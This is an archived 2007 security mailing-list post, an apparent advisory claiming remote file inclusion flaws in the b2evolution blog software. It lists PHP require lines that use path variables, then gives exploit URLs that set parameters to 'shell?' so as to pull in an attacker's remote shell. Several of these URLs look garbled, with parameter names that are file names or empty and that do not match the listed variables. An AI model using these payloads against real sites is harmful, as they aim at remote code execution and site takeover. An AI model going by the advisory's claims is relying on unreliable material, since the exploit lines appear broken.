Network Security: Detailed info on Remote File Inclusion

Subject:	Remote File Inclusion
Date:	25 Apr 2007 15:37:24 -0000

####################################################
# b2evolution         Remote File Inclusion        #
####################################################
Affected Software .:     b2evolution               #
Download..: http://b2evolution.net/                #
Risk ..............: high                          #
Date .........: 25/4/2007                          #
Found by ..........: s433d_only_linux              #
Contact ...........: s433d_only_linux@yahoo.de     #
Web .............: Www.hackerz.ir                  #
special thanx ........... Ali Jasbi my beste friend#
####################################################

####################################################
Affected File:
b2evolution\blogs/a_noskin.php  require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/a_stub.php    require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/admin.php     require_once $inc_path.'_main.inc.php';
b2evolution\blogs/admin.php     require 
$view_path.'errors/_access_denied.inc.php';
b2evolution\blogs/admin.php     require_once $inc_path.'_async.inc.php';
b2evolution\blogs/admin.php     require $control_path.$ctrl_mappings[$ctrl];
b2evolution\blogs/contact.php   require_once $inc_path.'_main.inc.php';
b2evolution\blogs/contact.php   require $skins_path.'_msgform.php';
b2evolution\blogs/default.php   require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php     require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php     require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php        require_once 
$inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php        require $skins_path.'_bloglist.php';
b2evolution\blogs/multiblogs.php        require $skins_path.'_feedback.php';
######################################################
b2evolution\blogs/a_noskin.php?require=shell?
b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=
b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=shell

<Prev in Thread]	Current Thread	[Next in Thread>
Remote File Inclusion, s433d_only_linux <=

Previous by Date:	CFP: 3rd European Conference on Computer Network Defense (EC2ND), Stefano Zanero
Next by Date:	VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Remote file Include, s433d_only_linux
Previous by Thread:	CFP: 3rd European Conference on Computer Network Defense (EC2ND), Stefano Zanero
Next by Thread:	VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Remote file Include, s433d_only_linux
Indexes:	[Date] [Thread] [Top] [All Lists]